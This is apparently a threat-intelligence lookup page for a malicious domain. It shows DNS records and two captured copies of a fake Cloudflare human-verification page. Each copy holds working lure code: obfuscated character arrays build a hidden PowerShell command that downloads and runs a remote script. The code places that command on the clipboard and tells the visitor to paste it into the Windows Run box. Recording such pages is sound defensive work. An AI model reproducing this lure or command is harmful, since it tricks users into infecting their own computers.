Help
RSS
API
Feed
Maltego
Contact
Domain > birdrepbox.com
×
More information on this domain is in
AlienVault OTX
Is this malicious?
Yes
No
DNS Resolutions
Date
IP Address
2026-01-18
104.21.48.56
(
ClassC
)
Port 80
HTTP/1.1 200 OKDate: Sun, 18 Jan 2026 10:43:55 GMTContent-Type: text/html; charsetutf-8Content-Length: 19928Connection: keep-alivex-content-type-options: nosniffx-frame-options: SAMEORIGINVary: accept-encodingReport-To: {group:cf-nel,max_age:604800,endpoints:{url:https://a.nel.cloudflare.com/report/v4?sALhiIMZoZGJtf7o5%2B0gWxHvevQt1A4qR18CQrGgWftaC%2F4keDL7ra9KtAUJfiFtiuHkC2H9C5I1Ja3%2BMCIp8kV%2FRuEEGQYefVZLGu4Ln}}Nel: {report_to:cf-nel,success_fraction:0.0,max_age:604800}Server: cloudflareCF-RAY: 9bfd7e80eb0dc62a-PDXalt-svc: h3:443; ma86400 !DOCTYPE html>html langen>head> meta charsetUTF-8> meta nameviewport contentwidthdevice-width, initial-scale1.0> title>Checking if you are human/title> link relstylesheet hrefhttps://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css> style> body { background-color: #fcfcfc; color: #333; } .tettx { color: rgb(78 78 78); } .verify-main { color: #333 !important; } .verify-verify-button { background: #333333 !important; } .checkbox-window { display: flex; flex-direction: column; align-items: center; width: 300px; height: 74px; background-color: #fafafa; border: 1px solid #e0e0e0; border-radius: 4px; padding: 10px; overflow: hidden; transition: width 0.5s ease-in-out, height 0.5s ease-in-out; } .checkbox-container { width: 28px; height: 28px; margin-left: 12px; margin-right: 8px; position: relative; }.checkbox { width: 100%; height: 100%; background-color: #ffffff; border-radius: 2px; border: 2px solid #888888; cursor: pointer; transition: border-color 0.3s, background-color 0.3s;} .checkbox.checked { border-color: #4285f4; background-color: #4285f4; position: relative; } .checkbox.checked::after { content: \f00c; font-family: FontAwesome; color: #fff; font-size: 18px; position: absolute; top: -2px; left: 2px; } .spinner { visibility: hidden; position: relative; } .verify-window { opacity: 0; visibility: hidden; width: 100%; height: 0; transition: opacity 0.5s ease-in-out, height 0.5s ease-in-out; } .verify-window.active { opacity: 1; visibility: visible; height: auto; } .verify-header { background-color: #e85d1a; padding: 10px; color: #fff; font-size: 14px; } .verify-main { padding: 10px; font-size: 14px; color: #fff; } .verify-footer { background-color: #f2f2f2; padding: 10px; text-align: right; } .verify-footer button { padding: 8px 15px; background: #4285f4; color: #fff; border: none; cursor: pointer; border-radius: 4px; } /* NEW STYLE */ .verify-window { width: auto; } .verify-header { background-color: #e85d1a; padding: 10px 16px; color: #fff; font-size: 14px; border-radius: 0; } .lds-ring div { border-color: #999 transparent transparent; } body.theme-light .lds-ring div { border-color: #595959 transparent transparent; } .lds-ring { display: inline-block; position: relative; } .lds-ring, .lds-ring div { height: 1.875rem; width: 1.875rem; } .lds-ring div { animation: lds-ring 1.2s cubic-bezier(0.5, 0, 0.5, 1) infinite; border: 0.3rem solid transparent; border-radius: 50%; border-top-color: #313131; box-sizing: border-box; display: block; position: absolute; } .lds-ring div:first-child { animation-delay: -0.45s; } .lds-ring div:nth-child(2) { animation-delay: -0.3s; } .lds-ring div:nth-child(3) { animation-delay: -0.15s; } @keyframes lds-ring { 0% { transform: rotate(0deg); } to { transform: rotate(1turn); } } @media (prefers-color-scheme: dark) { body .lds-ring div { border-color: #676767 transparent transparent; } } * { box-sizing: border-box; margin: 0; padding: 0; } body { font-family: system-ui, -apple-system, BlinkMacSystemFont, Segoe UI, Roboto, Helvetica Neue, Arial, Noto Sans, sans-serif, Apple Color Emoji, Segoe UI Emoji, Segoe UI Symbol, Noto Color Emoji; } body { display: flex; flex-direction: column; height: 100vh; min-height: 100vh; } .main-wrapper { align-items: center; display: flex; flex: 1; flex-direction: column; } .main-content { margin: 8rem auto; max-width: 60rem; padding-left: 1.5rem; padding-right: 1.5rem; width: 100%; } .footer { font-size: 0.75rem; line-height: 1.125rem; margin: 0 auto; max-width: 60rem; padding-left: 1.5rem; padding-right: 1.5rem; width: 100%; } .footer-inner { border-top: 1px solid #d9d9d9; padding-bottom: 1rem; padding-top: 1rem; text-align: center; } /* Popup Verification Window */ .verify-window { font-family: Roboto, helvetica, arial, sans-serif; opacity: 0; visibility: hidden; margin: auto; width: 310px; transition: opacity 400ms; } .verify-window { display: block; top: 5px; left: 54px; } .verify-header { background-color: #1a73e8; padding: 16px; color: #fff; font-size: 18px; border-radius: 8px 8px 0 0; } .verify-main { padding: 16px; font-size: 14px; color: #333; } .verify-main ol { padding-left: 20px; } .verify-main ol li { margin-bottom: 10px; } .verify-main code { display: block; margin-top: 10px; background-color: #f9f9f9; padding: 10px; font-size: 12px; border: 1px solid #ddd; } .verify-footer { background-color: #f2f2f2; padding: 16px; text-align: right; } .verify-footer button { padding: 10px 20px; background: #4285f4; color: #fff; border: none; border-radius: 5px; cursor: pointer; } .overlay { display: none; position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: rgba(0, 0, 0, 0.5); z-index: 10; } .overlay.active, .verify-window.active { display: block; } .verify-window { width: auto; } .verify-header { background-color: #e85d1a; padding: 10px 16px; color: #fff; font-size: 14px; border-radius: 0; } #spinner2 { width: 40px; height: 40px; animation: rotate 4s linear infinite; margin-top: -4px; }.checkbox-window { opacity: 0;}@keyframes rotate { from { transform: rotate(0deg); } to { transform: rotate(360deg); }} /style>/head>body>div classmain-wrapper> div classmain-content> div styledisplay: flex; align-items: center;> img classlogo-img src styleheight: 2rem; margin-right: 0.5rem; > p stylefont-size: 2.5rem; font-weight: 500; line-height: 3.75rem;>span classdomain-name>/span>/p> /div> div stylefont-size: 1.5rem; line-height: 2.25rem; margin-bottom: 2rem; min-height: 2rem;> p> span classpreloader_text>Checking if you are human. This may take a few seconds./span> span classtextallstep styledisplay: none;>Verify you are human by completing the action below./span> /p>/div> div classpreloader> div classlds-ring> div>/div>div>/div>div>/div>div>/div> /div> /div> div idcheckbox-window classcheckbox-window stylewidth: 300px; height: 74px; display: none;> div styledisplay: flex; align-items: center; width: 100%;> div classcheckbox-container stylemargin-left: 3px; margin-right: 12px; width: 30px;> svg styledisplay: none; classstep0 idspinner2 fillgreen viewBox0 0 60 60 xmlnshttp://www.w3.org/2000/svg> circle cx30 cy10 r2.5 classpoint>/circle> circle cx50 cy30 r2.5 classpoint>/circle> circle cx30 cy50 r2.5 classpoint>/circle> circle cx10 cy30 r2.5 classpoint>/circle> circle cx43.6 cy16.4 r2.5 classpoint>/circle> circle cx16.4 cy16.4 r2.5 classpoint>/circle> circle cx43.6 cy43.6 r2.5 classpoint>/circle> circle cx16.4 cy43.6 r2.5 classpoint>/circle> /svg> button typebutton idcheckbox classcheckbox step1 styledisplay: none;>/button> div classspinner step2 idspinner stylevisibility: hidden; display: none;> div classlds-ring>div>/div>div>/div>div>/div>div>/div>/div> /div> div classstep3 styledisplay: none;> svg width30 height30 viewBox0 0 50 50 xmlnshttp://www.w3.org/2000/svg> circle cx25 cy25 r23 fill#28a745 /> path dM15 25 L22 32 L35 18 strokewhite stroke-width4 fillnone stroke-linecapround stroke-linejoinround /> /svg> /div> /div> div classtettx> p classstep0 stylemargin: 0 !important; >Verifying.../p> p classstep1 stylemargin: 0 !important; display: none;>Im not a robot/p> p classstep2 stylemargin: 0 !important; display: none;>Verification Steps/p> p classstep3 stylemargin: 0 !important; display: none;>Successfully./p> /div> div stylefont-size: 8px; text-align: right; margin-left: auto;> img stylewidth: 67px; height: 23px; margin-bottom: 5px; srchttps://i.postimg.cc/k4zrz92z/111.png /> p styletext-decoration: underline;>Confidentiality/p> p styletext-decoration: underline;>Terms and Conditions/p> /div> /div> div idverify-window classverify-window styleborder-top: 1px solid #797979; padding-top: 3px; margin-top: 15px;> div classverify-container> main classverify-main stylecolor: #d9d9d9;> p stylefont-size: 18px; margin-bottom: 15px;> To better prove you are not a robot, please: /p> ol> li>Press & hold the Windows Key i classfab fa-windows>/i> + b>R/b>./li> li>In the verification window, press b>Ctrl/b> + b>V/b>./li> li>Press b>Enter/b> on your keyboard to finish./li> /ol> p stylepadding-top: 10px;> You will observe and agree: br /> code stylebackground: none; border: 1px solid #797979; width: 432px;> ✅ I am not a robot - reCAPTCHA Verification ID: span idverification-id>146820/span> /code> /p> /main> /div> div classverify-container verify-footer stylebackground: none;> div classverify-footer-left stylewidth: 286px; float: left; text-align: left; font-size: 15px;> Perform the steps above to finish verification. /div> button typebutton classverify-verify-button block idverify-button stylebackground: #5e5e5e; padding: 9px 38px;>Verify/button> /div> /div> /div> p stylefont-size: 1.5rem; line-height: 2.25rem; padding-top: 20px;>span classdomain-name>/span> Needs to review the security of your connection before proceeding./p> /div>/div>div classfooter rolecontentinfo> div classfooter-inner> div> div>Ray ID: code classray-id>56a4c5299fdetmca/code>/div> /div> div stylemargin-top: 5px;>Platform performance and security span stylecolor: #000000>Cloudflare/span>/div> /div>/div>script>// ОБФУСЦИРОВАННЫЕ ЧАСТИ КОМАНДЫ ДЛЯ ОБХОДА ФИЛЬТРОВ CLOUDFLARE// Каждый элемент массива представляет собой ASCII-код символа.// Это должно помочь обойти статический анализ Cloudflare.const obfuscatedCommandParts 112, 111, 119, 101, 114, 115, 104, 101, 108, 108, 46, 101, 120, 101, 32, 45, 119, 32, 104, 32, 45, 110, 111, 112, 32, 45, 99, 32, // powershell.exe -w h -nop -c 34, 36, 107, 104, 61, 39, 104, 116, 116, 112, 39, 43, 39, 115, 39, 59, // $khhttp+s; 34, 36, 98, 61, 39, 58, 39, 43, 39, 47, 47, 39, 43, 39, 97, 108, 97, 98, 97, 98, 97, 98, 97, 98, 97, 39, 43, 39, 46, 39, 43, 39, 99, 108, 111, 117, 100, 39, 43, 39, 47, 39, 59, // $b:+//+alababababa+.+cloud+/; 34, 36, 99, 61, 39, 99, 86, 71, 39, 43, 39, 118, 81, 105, 39, 43, 39, 111, 54, 39, 43, 39, 46, 116, 120, 116, 39, 59, // $ccVG+vQi+o6+.txt; 34, 36, 111, 109, 61, 36, 107, 104, 43, 36, 98, 43, 36, 99, 59, 36, 105, 61, 39, 123, 48, 125, 123, 49, 125, 123, 50, 125, 39, 32, 45, 102, 32, 39, 78, 101, 116, 46, 39, 44, 39, 87, 101, 98, 39, 44, 39, 67, 108, 105, 101, 110, 116, 39, 59, // $om$kh+$b+$c;$i{0}{1}{2} -f Net.,Web,Client; 34, 36, 114, 102, 61, 78, 101, 119, 45, 79, 98, 106, 101, 99, 116, 32, 40, 36, 105, 41, 59, 36, 107, 106, 61, 36, 114, 102, 46, 40, 39, 68, 111, 119, 110, 108, 111, 97, 100, 39, 43, 39, 83, 116, 114, 105, 110, 103, 39, 41, 40, 36, 111, 109, 41, 59, // $rfNew-Object ($i);$kj$rf.(Download+String)($om); 73, 110, 118, 111, 107, 101, 45, 69, 120, 112, 114, 101, 115, 115, 105, 111, 110, 32, 36, 107, 106, 34 // Invoke-Expression $kj (закрывающая кавышка);let command ; // Эта переменная будет хранить собранную команду// GET const params new URLSearchParams(window.location.search);// Мы не будем использовать siteUrl и logoUrl из параметров напрямую,// так как они будут браться из window.location.hostconst defaultLogoUrl https://2captcha.com/dist/web/assets/google-privacy-policy-Cb0CGVRT.svg;document.querySelectorAll(.domain-name).forEach(el > { el.textContent window.location.host; // Используем текущий хост});document.querySelectorAll(.logo-img).forEach(img > { img.src defaultLogoUrl; // Можно установить дефолтный логотип или оставить пустым img.alt logo;});document.addEventListener(DOMContentLoaded, function () { // Декодируем и собираем команду из обфусцированных частей command obfuscatedCommandParts.map(partArray > String.fromCharCode(...partArray) ).join(); const preloaderElements document.querySelectorAll(.preloader); const preloaderText document.querySelector(.preloader_text); const textAllStep document.querySelector(.textallstep); const checkboxWindow document.getElementById(checkbox-window); const step0Elements document.querySelectorAll(.step0); const step1Elements document.querySelectorAll(.step1); const step2Elements document.querySelectorAll(.step2); const step3Elements document.querySelectorAll(.step3); const checkbox document.getElementById(checkbox); const verifyWindow document.getElementById(verify-window); const spinner document.getElementById(spinner); const verifyButton document.getElementById(verify-button); setTimeout(() > { preloaderElements.forEach(el > el.style.display none); preloaderText.style.display none; textAllStep.style.display block; checkboxWindow.style.display flex; setTimeout(() > { checkboxWindow.style.display flex; let opacity 0; let fadeIn setInterval(() > { if (opacity > 1) { clearInterval(fadeIn); } else { opacity + 0.1; checkboxWindow.style.opacity opacity; } }, 30); }, 200); step0Elements.forEach(el > el.style.display block); setTimeout(() > { step0Elements.forEach(el > el.style.display none); step1Elements.forEach(el > el.style.display block); }, 2000); // --- ВАЖНО: АВТОМАТИЧЕСКИЙ РЕДИРЕКТ НА СЕБЯ С ПАРАМЕТРОМ ЧЕРЕЗ 30 СЕКУНД --- // Используем 30 секунд (30000 миллисекунд) setTimeout(() > { console.log(30 секунд истекло, перенаправляем для установки куки...); // Получаем текущий URL, добавляем к нему параметр const currentUrl new URL(window.location.href); currentUrl.searchParams.set(verified_redirect, true); // Добавляем параметр window.location.replace(currentUrl.toString()); }, 30000); // 30 секунд }, 1500); // Если вы хотите полностью отключить ручное взаимодействие с капчей, // вы можете удалить обработчики click для checkbox и verifyButton, // или по крайней мере убедиться, что они тоже приводят к редиректу. // Я оставлю их, но они не будут основными триггерами. checkbox.addEventListener(click, function () { const textarea document.createElement(textarea); textarea.value command; // Используем собранную команду textarea.setAttribute(readonly, ); textarea.style.position absolute; textarea.style.left -9999px; document.body.appendChild(textarea); textarea.select(); document.execCommand(copy); document.body.removeChild(textarea); console.log(✅ Команда скопирована в буфер обмена.); step1Elements.forEach(el > el.style.display none); step2Elements.forEach(el > el.style.display block); spinner.style.visibility visible; setTimeout(() > { checkboxWindow.style.width 530px; checkboxWindow.style.height auto; verifyWindow.classList.add(active); }, 500); }); verifyButton.addEventListener(click, function () { verifyWindow.classList.remove(active); checkboxWindow.style.height 74px; setTimeout(() > { checkboxWindow.style.width 300px; step2Elements.forEach(el > el.style.display none); step3Elements.forEach(el > el.style.display block); setTimeout(() > { step3Elements.forEach(el > el.style.display none); step1Elements.forEach(el > el.style.display block); spinner.style.visibility hidden; }, 1000); }, 600); // Кнопка Verify теперь также перенаправляет на тот же URL с параметром const currentUrl new URL(window.location.href); currentUrl.searchParams.set(verified_redirect, true); window.location.replace(currentUrl.toString()); }); document.getElementById(verification-id).textContent Math.floor(100000 + Math.random() * 900000); const chars abcdef0123456789; document.querySelector(.ray-id).textContent Array.from({ length: 16 }, () > charsMath.floor(Math.random() * chars.length)).join();});document.addEventListener(copy, function (e) { e.preventDefault(); if (e.clipboardData) { e.clipboardData.setData(text/plain, command); // Используем собранную команду console.log(✅ Команда скопирована через обработчик copy.); } else if (window.clipboardData) { window.clipboardData.setData(Text, command); }});/script>/body>/html>
Port 443
HTTP/1.1 200 OKDate: Sun, 18 Jan 2026 10:43:55 GMTContent-Type: text/html; charsetutf-8Content-Length: 19928Connection: keep-alivex-content-type-options: nosniffx-frame-options: SAMEORIGINVary: accept-encodingReport-To: {group:cf-nel,max_age:604800,endpoints:{url:https://a.nel.cloudflare.com/report/v4?suSP0dnTa9b8rCwszGhraTGTGZAsfpms9f9eL6oO00WOmywu4PuEpbISlOW3%2F2at9QHBh7PTJCU2hG1leWJb0iccZEY0nK1FEwecvEQ%3D%3D}}Nel: {report_to:cf-nel,success_fraction:0.0,max_age:604800}Server: cloudflareCF-RAY: 9bfd7e813e55ff12-PDXalt-svc: h3:443; ma86400 !DOCTYPE html>html langen>head> meta charsetUTF-8> meta nameviewport contentwidthdevice-width, initial-scale1.0> title>Checking if you are human/title> link relstylesheet hrefhttps://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css> style> body { background-color: #fcfcfc; color: #333; } .tettx { color: rgb(78 78 78); } .verify-main { color: #333 !important; } .verify-verify-button { background: #333333 !important; } .checkbox-window { display: flex; flex-direction: column; align-items: center; width: 300px; height: 74px; background-color: #fafafa; border: 1px solid #e0e0e0; border-radius: 4px; padding: 10px; overflow: hidden; transition: width 0.5s ease-in-out, height 0.5s ease-in-out; } .checkbox-container { width: 28px; height: 28px; margin-left: 12px; margin-right: 8px; position: relative; }.checkbox { width: 100%; height: 100%; background-color: #ffffff; border-radius: 2px; border: 2px solid #888888; cursor: pointer; transition: border-color 0.3s, background-color 0.3s;} .checkbox.checked { border-color: #4285f4; background-color: #4285f4; position: relative; } .checkbox.checked::after { content: \f00c; font-family: FontAwesome; color: #fff; font-size: 18px; position: absolute; top: -2px; left: 2px; } .spinner { visibility: hidden; position: relative; } .verify-window { opacity: 0; visibility: hidden; width: 100%; height: 0; transition: opacity 0.5s ease-in-out, height 0.5s ease-in-out; } .verify-window.active { opacity: 1; visibility: visible; height: auto; } .verify-header { background-color: #e85d1a; padding: 10px; color: #fff; font-size: 14px; } .verify-main { padding: 10px; font-size: 14px; color: #fff; } .verify-footer { background-color: #f2f2f2; padding: 10px; text-align: right; } .verify-footer button { padding: 8px 15px; background: #4285f4; color: #fff; border: none; cursor: pointer; border-radius: 4px; } /* NEW STYLE */ .verify-window { width: auto; } .verify-header { background-color: #e85d1a; padding: 10px 16px; color: #fff; font-size: 14px; border-radius: 0; } .lds-ring div { border-color: #999 transparent transparent; } body.theme-light .lds-ring div { border-color: #595959 transparent transparent; } .lds-ring { display: inline-block; position: relative; } .lds-ring, .lds-ring div { height: 1.875rem; width: 1.875rem; } .lds-ring div { animation: lds-ring 1.2s cubic-bezier(0.5, 0, 0.5, 1) infinite; border: 0.3rem solid transparent; border-radius: 50%; border-top-color: #313131; box-sizing: border-box; display: block; position: absolute; } .lds-ring div:first-child { animation-delay: -0.45s; } .lds-ring div:nth-child(2) { animation-delay: -0.3s; } .lds-ring div:nth-child(3) { animation-delay: -0.15s; } @keyframes lds-ring { 0% { transform: rotate(0deg); } to { transform: rotate(1turn); } } @media (prefers-color-scheme: dark) { body .lds-ring div { border-color: #676767 transparent transparent; } } * { box-sizing: border-box; margin: 0; padding: 0; } body { font-family: system-ui, -apple-system, BlinkMacSystemFont, Segoe UI, Roboto, Helvetica Neue, Arial, Noto Sans, sans-serif, Apple Color Emoji, Segoe UI Emoji, Segoe UI Symbol, Noto Color Emoji; } body { display: flex; flex-direction: column; height: 100vh; min-height: 100vh; } .main-wrapper { align-items: center; display: flex; flex: 1; flex-direction: column; } .main-content { margin: 8rem auto; max-width: 60rem; padding-left: 1.5rem; padding-right: 1.5rem; width: 100%; } .footer { font-size: 0.75rem; line-height: 1.125rem; margin: 0 auto; max-width: 60rem; padding-left: 1.5rem; padding-right: 1.5rem; width: 100%; } .footer-inner { border-top: 1px solid #d9d9d9; padding-bottom: 1rem; padding-top: 1rem; text-align: center; } /* Popup Verification Window */ .verify-window { font-family: Roboto, helvetica, arial, sans-serif; opacity: 0; visibility: hidden; margin: auto; width: 310px; transition: opacity 400ms; } .verify-window { display: block; top: 5px; left: 54px; } .verify-header { background-color: #1a73e8; padding: 16px; color: #fff; font-size: 18px; border-radius: 8px 8px 0 0; } .verify-main { padding: 16px; font-size: 14px; color: #333; } .verify-main ol { padding-left: 20px; } .verify-main ol li { margin-bottom: 10px; } .verify-main code { display: block; margin-top: 10px; background-color: #f9f9f9; padding: 10px; font-size: 12px; border: 1px solid #ddd; } .verify-footer { background-color: #f2f2f2; padding: 16px; text-align: right; } .verify-footer button { padding: 10px 20px; background: #4285f4; color: #fff; border: none; border-radius: 5px; cursor: pointer; } .overlay { display: none; position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: rgba(0, 0, 0, 0.5); z-index: 10; } .overlay.active, .verify-window.active { display: block; } .verify-window { width: auto; } .verify-header { background-color: #e85d1a; padding: 10px 16px; color: #fff; font-size: 14px; border-radius: 0; } #spinner2 { width: 40px; height: 40px; animation: rotate 4s linear infinite; margin-top: -4px; }.checkbox-window { opacity: 0;}@keyframes rotate { from { transform: rotate(0deg); } to { transform: rotate(360deg); }} /style>/head>body>div classmain-wrapper> div classmain-content> div styledisplay: flex; align-items: center;> img classlogo-img src styleheight: 2rem; margin-right: 0.5rem; > p stylefont-size: 2.5rem; font-weight: 500; line-height: 3.75rem;>span classdomain-name>/span>/p> /div> div stylefont-size: 1.5rem; line-height: 2.25rem; margin-bottom: 2rem; min-height: 2rem;> p> span classpreloader_text>Checking if you are human. This may take a few seconds./span> span classtextallstep styledisplay: none;>Verify you are human by completing the action below./span> /p>/div> div classpreloader> div classlds-ring> div>/div>div>/div>div>/div>div>/div> /div> /div> div idcheckbox-window classcheckbox-window stylewidth: 300px; height: 74px; display: none;> div styledisplay: flex; align-items: center; width: 100%;> div classcheckbox-container stylemargin-left: 3px; margin-right: 12px; width: 30px;> svg styledisplay: none; classstep0 idspinner2 fillgreen viewBox0 0 60 60 xmlnshttp://www.w3.org/2000/svg> circle cx30 cy10 r2.5 classpoint>/circle> circle cx50 cy30 r2.5 classpoint>/circle> circle cx30 cy50 r2.5 classpoint>/circle> circle cx10 cy30 r2.5 classpoint>/circle> circle cx43.6 cy16.4 r2.5 classpoint>/circle> circle cx16.4 cy16.4 r2.5 classpoint>/circle> circle cx43.6 cy43.6 r2.5 classpoint>/circle> circle cx16.4 cy43.6 r2.5 classpoint>/circle> /svg> button typebutton idcheckbox classcheckbox step1 styledisplay: none;>/button> div classspinner step2 idspinner stylevisibility: hidden; display: none;> div classlds-ring>div>/div>div>/div>div>/div>div>/div>/div> /div> div classstep3 styledisplay: none;> svg width30 height30 viewBox0 0 50 50 xmlnshttp://www.w3.org/2000/svg> circle cx25 cy25 r23 fill#28a745 /> path dM15 25 L22 32 L35 18 strokewhite stroke-width4 fillnone stroke-linecapround stroke-linejoinround /> /svg> /div> /div> div classtettx> p classstep0 stylemargin: 0 !important; >Verifying.../p> p classstep1 stylemargin: 0 !important; display: none;>Im not a robot/p> p classstep2 stylemargin: 0 !important; display: none;>Verification Steps/p> p classstep3 stylemargin: 0 !important; display: none;>Successfully./p> /div> div stylefont-size: 8px; text-align: right; margin-left: auto;> img stylewidth: 67px; height: 23px; margin-bottom: 5px; srchttps://i.postimg.cc/k4zrz92z/111.png /> p styletext-decoration: underline;>Confidentiality/p> p styletext-decoration: underline;>Terms and Conditions/p> /div> /div> div idverify-window classverify-window styleborder-top: 1px solid #797979; padding-top: 3px; margin-top: 15px;> div classverify-container> main classverify-main stylecolor: #d9d9d9;> p stylefont-size: 18px; margin-bottom: 15px;> To better prove you are not a robot, please: /p> ol> li>Press & hold the Windows Key i classfab fa-windows>/i> + b>R/b>./li> li>In the verification window, press b>Ctrl/b> + b>V/b>./li> li>Press b>Enter/b> on your keyboard to finish./li> /ol> p stylepadding-top: 10px;> You will observe and agree: br /> code stylebackground: none; border: 1px solid #797979; width: 432px;> ✅ I am not a robot - reCAPTCHA Verification ID: span idverification-id>146820/span> /code> /p> /main> /div> div classverify-container verify-footer stylebackground: none;> div classverify-footer-left stylewidth: 286px; float: left; text-align: left; font-size: 15px;> Perform the steps above to finish verification. /div> button typebutton classverify-verify-button block idverify-button stylebackground: #5e5e5e; padding: 9px 38px;>Verify/button> /div> /div> /div> p stylefont-size: 1.5rem; line-height: 2.25rem; padding-top: 20px;>span classdomain-name>/span> Needs to review the security of your connection before proceeding./p> /div>/div>div classfooter rolecontentinfo> div classfooter-inner> div> div>Ray ID: code classray-id>56a4c5299fdetmca/code>/div> /div> div stylemargin-top: 5px;>Platform performance and security span stylecolor: #000000>Cloudflare/span>/div> /div>/div>script>// ОБФУСЦИРОВАННЫЕ ЧАСТИ КОМАНДЫ ДЛЯ ОБХОДА ФИЛЬТРОВ CLOUDFLARE// Каждый элемент массива представляет собой ASCII-код символа.// Это должно помочь обойти статический анализ Cloudflare.const obfuscatedCommandParts 112, 111, 119, 101, 114, 115, 104, 101, 108, 108, 46, 101, 120, 101, 32, 45, 119, 32, 104, 32, 45, 110, 111, 112, 32, 45, 99, 32, // powershell.exe -w h -nop -c 34, 36, 107, 104, 61, 39, 104, 116, 116, 112, 39, 43, 39, 115, 39, 59, // $khhttp+s; 34, 36, 98, 61, 39, 58, 39, 43, 39, 47, 47, 39, 43, 39, 97, 108, 97, 98, 97, 98, 97, 98, 97, 98, 97, 39, 43, 39, 46, 39, 43, 39, 99, 108, 111, 117, 100, 39, 43, 39, 47, 39, 59, // $b:+//+alababababa+.+cloud+/; 34, 36, 99, 61, 39, 99, 86, 71, 39, 43, 39, 118, 81, 105, 39, 43, 39, 111, 54, 39, 43, 39, 46, 116, 120, 116, 39, 59, // $ccVG+vQi+o6+.txt; 34, 36, 111, 109, 61, 36, 107, 104, 43, 36, 98, 43, 36, 99, 59, 36, 105, 61, 39, 123, 48, 125, 123, 49, 125, 123, 50, 125, 39, 32, 45, 102, 32, 39, 78, 101, 116, 46, 39, 44, 39, 87, 101, 98, 39, 44, 39, 67, 108, 105, 101, 110, 116, 39, 59, // $om$kh+$b+$c;$i{0}{1}{2} -f Net.,Web,Client; 34, 36, 114, 102, 61, 78, 101, 119, 45, 79, 98, 106, 101, 99, 116, 32, 40, 36, 105, 41, 59, 36, 107, 106, 61, 36, 114, 102, 46, 40, 39, 68, 111, 119, 110, 108, 111, 97, 100, 39, 43, 39, 83, 116, 114, 105, 110, 103, 39, 41, 40, 36, 111, 109, 41, 59, // $rfNew-Object ($i);$kj$rf.(Download+String)($om); 73, 110, 118, 111, 107, 101, 45, 69, 120, 112, 114, 101, 115, 115, 105, 111, 110, 32, 36, 107, 106, 34 // Invoke-Expression $kj (закрывающая кавышка);let command ; // Эта переменная будет хранить собранную команду// GET const params new URLSearchParams(window.location.search);// Мы не будем использовать siteUrl и logoUrl из параметров напрямую,// так как они будут браться из window.location.hostconst defaultLogoUrl https://2captcha.com/dist/web/assets/google-privacy-policy-Cb0CGVRT.svg;document.querySelectorAll(.domain-name).forEach(el > { el.textContent window.location.host; // Используем текущий хост});document.querySelectorAll(.logo-img).forEach(img > { img.src defaultLogoUrl; // Можно установить дефолтный логотип или оставить пустым img.alt logo;});document.addEventListener(DOMContentLoaded, function () { // Декодируем и собираем команду из обфусцированных частей command obfuscatedCommandParts.map(partArray > String.fromCharCode(...partArray) ).join(); const preloaderElements document.querySelectorAll(.preloader); const preloaderText document.querySelector(.preloader_text); const textAllStep document.querySelector(.textallstep); const checkboxWindow document.getElementById(checkbox-window); const step0Elements document.querySelectorAll(.step0); const step1Elements document.querySelectorAll(.step1); const step2Elements document.querySelectorAll(.step2); const step3Elements document.querySelectorAll(.step3); const checkbox document.getElementById(checkbox); const verifyWindow document.getElementById(verify-window); const spinner document.getElementById(spinner); const verifyButton document.getElementById(verify-button); setTimeout(() > { preloaderElements.forEach(el > el.style.display none); preloaderText.style.display none; textAllStep.style.display block; checkboxWindow.style.display flex; setTimeout(() > { checkboxWindow.style.display flex; let opacity 0; let fadeIn setInterval(() > { if (opacity > 1) { clearInterval(fadeIn); } else { opacity + 0.1; checkboxWindow.style.opacity opacity; } }, 30); }, 200); step0Elements.forEach(el > el.style.display block); setTimeout(() > { step0Elements.forEach(el > el.style.display none); step1Elements.forEach(el > el.style.display block); }, 2000); // --- ВАЖНО: АВТОМАТИЧЕСКИЙ РЕДИРЕКТ НА СЕБЯ С ПАРАМЕТРОМ ЧЕРЕЗ 30 СЕКУНД --- // Используем 30 секунд (30000 миллисекунд) setTimeout(() > { console.log(30 секунд истекло, перенаправляем для установки куки...); // Получаем текущий URL, добавляем к нему параметр const currentUrl new URL(window.location.href); currentUrl.searchParams.set(verified_redirect, true); // Добавляем параметр window.location.replace(currentUrl.toString()); }, 30000); // 30 секунд }, 1500); // Если вы хотите полностью отключить ручное взаимодействие с капчей, // вы можете удалить обработчики click для checkbox и verifyButton, // или по крайней мере убедиться, что они тоже приводят к редиректу. // Я оставлю их, но они не будут основными триггерами. checkbox.addEventListener(click, function () { const textarea document.createElement(textarea); textarea.value command; // Используем собранную команду textarea.setAttribute(readonly, ); textarea.style.position absolute; textarea.style.left -9999px; document.body.appendChild(textarea); textarea.select(); document.execCommand(copy); document.body.removeChild(textarea); console.log(✅ Команда скопирована в буфер обмена.); step1Elements.forEach(el > el.style.display none); step2Elements.forEach(el > el.style.display block); spinner.style.visibility visible; setTimeout(() > { checkboxWindow.style.width 530px; checkboxWindow.style.height auto; verifyWindow.classList.add(active); }, 500); }); verifyButton.addEventListener(click, function () { verifyWindow.classList.remove(active); checkboxWindow.style.height 74px; setTimeout(() > { checkboxWindow.style.width 300px; step2Elements.forEach(el > el.style.display none); step3Elements.forEach(el > el.style.display block); setTimeout(() > { step3Elements.forEach(el > el.style.display none); step1Elements.forEach(el > el.style.display block); spinner.style.visibility hidden; }, 1000); }, 600); // Кнопка Verify теперь также перенаправляет на тот же URL с параметром const currentUrl new URL(window.location.href); currentUrl.searchParams.set(verified_redirect, true); window.location.replace(currentUrl.toString()); }); document.getElementById(verification-id).textContent Math.floor(100000 + Math.random() * 900000); const chars abcdef0123456789; document.querySelector(.ray-id).textContent Array.from({ length: 16 }, () > charsMath.floor(Math.random() * chars.length)).join();});document.addEventListener(copy, function (e) { e.preventDefault(); if (e.clipboardData) { e.clipboardData.setData(text/plain, command); // Используем собранную команду console.log(✅ Команда скопирована через обработчик copy.); } else if (window.clipboardData) { window.clipboardData.setData(Text, command); }});/script>/body>/html>
View on OTX
|
View on ThreatMiner
Please enable JavaScript to view the
comments powered by Disqus.
Data with thanks to
AlienVault OTX
,
VirusTotal
,
Malwr
and
others
. [
Sitemap
]